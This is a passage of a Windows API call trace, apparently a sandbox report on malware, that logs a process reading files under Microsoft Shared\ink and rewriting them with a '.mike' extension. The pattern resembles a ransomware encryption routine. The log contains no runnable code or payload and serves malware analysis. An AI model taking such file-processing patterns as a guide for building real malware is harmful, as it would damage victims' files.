lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipshrv.xml", lpFilePart=0x0) returned 0x3d [0043.784] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af11c) returned 1 [0043.784] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipshrv.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipshrv.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0043.785] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2adf58) returned 1 [0043.785] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipshrv.xml", nBufferLength=0x105, lpBuffer=0x2aeb60, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipshrv.xml", lpFilePart=0x0) returned 0x3d [0043.785] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af054) returned 1 [0043.785] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipshrv.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipshrv.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0043.786] GetFileType (hFile=0x264) returned 0x1 [0043.786] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af050) returned 1 [0043.786] GetFileType (hFile=0x264) returned 0x1 [0043.786] CloseHandle (hObject=0x264) returned 1 [0043.786] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipshrv.xml", nBufferLength=0x105, lpBuffer=0x2aecac, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipshrv.xml", lpFilePart=0x0) returned 0x3d [0043.786] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipshrv.xml", nBufferLength=0x105, lpBuffer=0x2aecd4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipshrv.xml", lpFilePart=0x0) returned 0x3d [0043.786] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x2aec5c, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0043.786] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af1b0) returned 1 [0043.786] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0043.786] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af1ac) returned 1 [0043.786] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af180) returned 1 [0043.786] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipshrv.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipshrv.xml"), fInfoLevelId=0x0, lpFileInformation=0x219e124 | out: lpFileInformation=0x219e124*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x27ce22e5, ftCreationTime.dwHighDateTime=0x1ca03fa, ftLastAccessTime.dwLowDateTime=0x27ce22e5, ftLastAccessTime.dwHighDateTime=0x1ca03fa, ftLastWriteTime.dwLowDateTime=0x91865215, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xa5c)) returned 1 [0043.786] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af17c) returned 1 [0043.787] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipshrv.xml", nBufferLength=0x105, lpBuffer=0x2aecd4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipshrv.xml", lpFilePart=0x0) returned 0x3d [0043.787] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af180) returned 1 [0043.787] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipshrv.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipshrv.xml"), fInfoLevelId=0x0, lpFileInformation=0x219e414 | out: lpFileInformation=0x219e414*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x27ce22e5, ftCreationTime.dwHighDateTime=0x1ca03fa, ftLastAccessTime.dwLowDateTime=0x27ce22e5, ftLastAccessTime.dwHighDateTime=0x1ca03fa, ftLastWriteTime.dwLowDateTime=0x91865215, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xa5c)) returned 1 [0043.787] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af17c) returned 1 [0043.787] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipshrv.xml", nBufferLength=0x105, lpBuffer=0x2aecb4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipshrv.xml", lpFilePart=0x0) returned 0x3d [0043.787] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipshrv.xml.mike", nBufferLength=0x105, lpBuffer=0x2aecd8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipshrv.xml.mike", lpFilePart=0x0) returned 0x42 [0043.787] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af138) returned 1 [0043.787] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipshrv.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipshrv.xml.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af1b4 | out: lpFileInformation=0x2af1b4*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0043.787] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af134) returned 1 [0043.787] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipshrv.xml", nBufferLength=0x105, lpBuffer=0x2aecb8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipshrv.xml", lpFilePart=0x0) returned 0x3d [0043.787] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipshrv.xml", nBufferLength=0x105, lpBuffer=0x2aecb0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipshrv.xml", lpFilePart=0x0) returned 0x3d [0043.787] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipshrv.xml", nBufferLength=0x105, lpBuffer=0x2aec3c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipshrv.xml", lpFilePart=0x0) returned 0x3d [0043.787] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipshrv.xml.mike", nBufferLength=0x105, lpBuffer=0x2aec40, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipshrv.xml.mike", lpFilePart=0x0) returned 0x42 [0043.787] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0a0) returned 1 [0043.787] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipshrv.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipshrv.xml.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af11c | out: lpFileInformation=0x2af11c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0043.788] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af09c) returned 1 [0043.788] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipshrv.xml.mike", nBufferLength=0x105, lpBuffer=0x2aeb48, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipshrv.xml.mike", lpFilePart=0x0) returned 0x42 [0043.788] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af03c) returned 1 [0043.788] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipshrv.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipshrv.xml.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0043.788] GetFileType (hFile=0x264) returned 0x1 [0043.788] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af038) returned 1 [0043.788] GetFileType (hFile=0x264) returned 0x1 [0043.788] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af010*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af010*=0) returned 0x0 [0043.788] WriteFile (in: hFile=0x264, lpBuffer=0x219f168*, nNumberOfBytesToWrite=0x220, lpNumberOfBytesWritten=0x2af0bc, lpOverlapped=0x0 | out: lpBuffer=0x219f168*, lpNumberOfBytesWritten=0x2af0bc*=0x220, lpOverlapped=0x0) returned 1 [0043.789] CloseHandle (hObject=0x264) returned 1 [0043.789] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0e8) returned 1 [0043.789] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipshrv.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipshrv.xml"), fInfoLevelId=0x0, lpFileInformation=0x219ecac | out: lpFileInformation=0x219ecac*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x27ce22e5, ftCreationTime.dwHighDateTime=0x1ca03fa, ftLastAccessTime.dwLowDateTime=0x27ce22e5, ftLastAccessTime.dwHighDateTime=0x1ca03fa, ftLastWriteTime.dwLowDateTime=0x91865215, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xa5c)) returned 1 [0043.789] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0e4) returned 1 [0043.790] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipshrv.xml", nBufferLength=0x105, lpBuffer=0x2aeb38, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipshrv.xml", lpFilePart=0x0) returned 0x3d [0043.790] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af02c) returned 1 [0043.790] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipshrv.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipshrv.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0043.790] GetFileType (hFile=0x264) returned 0x1 [0043.790] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af028) returned 1 [0043.790] GetFileType (hFile=0x264) returned 0x1 [0043.790] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af0bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af0bc*=0) returned 0x0 [0043.790] ReadFile (in: hFile=0x264, lpBuffer=0x21a027c, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af0c8, lpOverlapped=0x0 | out: lpBuffer=0x21a027c*, lpNumberOfBytesRead=0x2af0c8*=0xa5c, lpOverlapped=0x0) returned 1 [0043.797] CloseHandle (hObject=0x264) returned 1 [0043.797] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipshrv.xml.mike", nBufferLength=0x105, lpBuffer=0x2aeb48, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipshrv.xml.mike", lpFilePart=0x0) returned 0x42 [0043.797] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af03c) returned 1 [0043.797] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipshrv.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipshrv.xml.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0043.797] GetFileType (hFile=0x264) returned 0x1 [0043.797] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af038) returned 1 [0043.797] GetFileType (hFile=0x264) returned 0x1 [0043.798] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af010*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af010*=0) returned 0x220 [0043.798] WriteFile (in: hFile=0x264, lpBuffer=0x21a6f34*, nNumberOfBytesToWrite=0xa60, lpNumberOfBytesWritten=0x2af0bc, lpOverlapped=0x0 | out: lpBuffer=0x21a6f34*, lpNumberOfBytesWritten=0x2af0bc*=0xa60, lpOverlapped=0x0) returned 1 [0043.798] CloseHandle (hObject=0x264) returned 1 [0043.799] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipshrv.xml.mike", nBufferLength=0x105, lpBuffer=0x2aeb50, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipshrv.xml.mike", lpFilePart=0x0) returned 0x42 [0043.799] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af044) returned 1 [0043.799] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipshrv.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipshrv.xml.mike"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0043.799] GetFileType (hFile=0x264) returned 0x1 [0043.799] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af040) returned 1 [0043.799] GetFileType (hFile=0x264) returned 0x1 [0043.800] WriteFile (in: hFile=0x264, lpBuffer=0x21aa148*, nNumberOfBytesToWrite=0x20c, lpNumberOfBytesWritten=0x2af0ec, lpOverlapped=0x0 | out: lpBuffer=0x21aa148*, lpNumberOfBytesWritten=0x2af0ec*=0x20c, lpOverlapped=0x0) returned 1 [0043.800] CloseHandle (hObject=0x264) returned 1 [0043.803] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipshrv.xml", nBufferLength=0x105, lpBuffer=0x2aecb4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipshrv.xml", lpFilePart=0x0) returned 0x3d [0043.803] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipshrv.xml.mike", nBufferLength=0x105, lpBuffer=0x2aecd8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipshrv.xml.mike", lpFilePart=0x0) returned 0x42 [0043.803] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af138) returned 1 [0043.803] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipshrv.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipshrv.xml.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af1b4 | out: lpFileInformation=0x2af1b4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe44cf240, ftCreationTime.dwHighDateTime=0x1d57a86, ftLastAccessTime.dwLowDateTime=0xe44cf240, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe44f53a0, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0xc80)) returned 1 [0043.803] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af134) returned 1 [0043.803] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipshrv.xml", nBufferLength=0x105, lpBuffer=0x2aecb4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipshrv.xml", lpFilePart=0x0) returned 0x3d [0043.803] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipshrv.xml.mike", nBufferLength=0x105, lpBuffer=0x2aecd4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipshrv.xml.mike", lpFilePart=0x0) returned 0x42 [0043.803] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af180) returned 1 [0043.803] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipshrv.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipshrv.xml.mike"), fInfoLevelId=0x0, lpFileInformation=0x21ab7f8 | out: lpFileInformation=0x21ab7f8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe44cf240, ftCreationTime.dwHighDateTime=0x1d57a86, ftLastAccessTime.dwLowDateTime=0xe44cf240, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe44f53a0, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0xc80)) returned 1 [0043.803] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af17c) returned 1 [0043.803] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipshrv.xml", nBufferLength=0x105, lpBuffer=0x2aec58, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipshrv.xml", lpFilePart=0x0) returned 0x3d [0043.804] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipshrv.xml", dwFileAttributes=0x80) returned 0 [0043.805] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipshrv.xml", nBufferLength=0x105, lpBuffer=0x2aebec, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipshrv.xml", lpFilePart=0x0) returned 0x3d [0043.805] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipshrv.xml.mike", nBufferLength=0x105, lpBuffer=0x2aec10, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipshrv.xml.mike", lpFilePart=0x0) returned 0x42 [0043.805] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af070) returned 1 [0043.805] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipshrv.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipshrv.xml.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af0ec | out: lpFileInformation=0x2af0ec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe44cf240, ftCreationTime.dwHighDateTime=0x1d57a86, ftLastAccessTime.dwLowDateTime=0xe44cf240, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe44f53a0, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0xc80)) returned 1 [0043.805] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af06c) returned 1 [0043.805] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipshrv.xml", nBufferLength=0x105, lpBuffer=0x2aebec, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipshrv.xml", lpFilePart=0x0) returned 0x3d [0043.805] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipshrv.xml.mike", nBufferLength=0x105, lpBuffer=0x2aec18, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipshrv.xml.mike", lpFilePart=0x0) returned 0x42 [0043.805] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipshrv.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipshrv.xml.mike")) returned 1 [0043.806] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsita.xml", nBufferLength=0x105, lpBuffer=0x2aecac, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsita.xml", lpFilePart=0x0) returned 0x3d [0043.806] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsita.xml", nBufferLength=0x105, lpBuffer=0x2aecac, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsita.xml", lpFilePart=0x0) returned 0x3d [0043.806] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsita.xml", nBufferLength=0x105, lpBuffer=0x2aec28, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsita.xml", lpFilePart=0x0) returned 0x3d [0043.806] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af11c) returned 1 [0043.806] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsita.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsita.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0043.807] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2adf58) returned 1 [0043.807] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsita.xml", nBufferLength=0x105, lpBuffer=0x2aeb60, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsita.xml", lpFilePart=0x0) returned 0x3d [0043.807] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af054) returned 1 [0043.808] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsita.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsita.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0043.808] GetFileType (hFile=0x264) returned 0x1 [0043.808] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af050) returned 1 [0043.808] GetFileType (hFile=0x264) returned 0x1 [0043.808] CloseHandle (hObject=0x264) returned 1 [0043.808] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsita.xml", nBufferLength=0x105, lpBuffer=0x2aecac, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsita.xml", lpFilePart=0x0) returned 0x3d [0043.808] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsita.xml", nBufferLength=0x105, lpBuffer=0x2aecd4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsita.xml", lpFilePart=0x0) returned 0x3d [0043.808] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x2aec5c, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0043.808] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af1b0) returned 1 [0043.808] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0043.809] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af1ac) returned 1 [0043.809] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af180) returned 1 [0043.809] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsita.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsita.xml"), fInfoLevelId=0x0, lpFileInformation=0x21ad758 | out: lpFileInformation=0x21ad758*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x27ce22e5, ftCreationTime.dwHighDateTime=0x1ca03fa, ftLastAccessTime.dwLowDateTime=0x27ce22e5, ftLastAccessTime.dwHighDateTime=0x1ca03fa, ftLastWriteTime.dwLowDateTime=0x91865215, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x9de)) returned 1 [0043.809] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af17c) returned 1 [0043.809] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsita.xml", nBufferLength=0x105, lpBuffer=0x2aecd4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsita.xml", lpFilePart=0x0) returned 0x3d [0043.809] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af180) returned 1 [0043.809] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsita.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsita.xml"), fInfoLevelId=0x0, lpFileInformation=0x21ada48 | out: lpFileInformation=0x21ada48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x27ce22e5, ftCreationTime.dwHighDateTime=0x1ca03fa, ftLastAccessTime.dwLowDateTime=0x27ce22e5, ftLastAccessTime.dwHighDateTime=0x1ca03fa, ftLastWriteTime.dwLowDateTime=0x91865215, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x9de)) returned 1 [0043.809] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af17c) returned 1 [0043.809] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsita.xml", nBufferLength=0x105, lpBuffer=0x2aecb4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsita.xml", lpFilePart=0x0) returned 0x3d [0043.809] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsita.xml.mike", nBufferLength=0x105, lpBuffer=0x2aecd8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsita.xml.mike", lpFilePart=0x0) returned 0x42 [0043.809] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af138) returned 1 [0043.809] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsita.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsita.xml.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af1b4 | out: lpFileInformation=0x2af1b4*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0043.809] 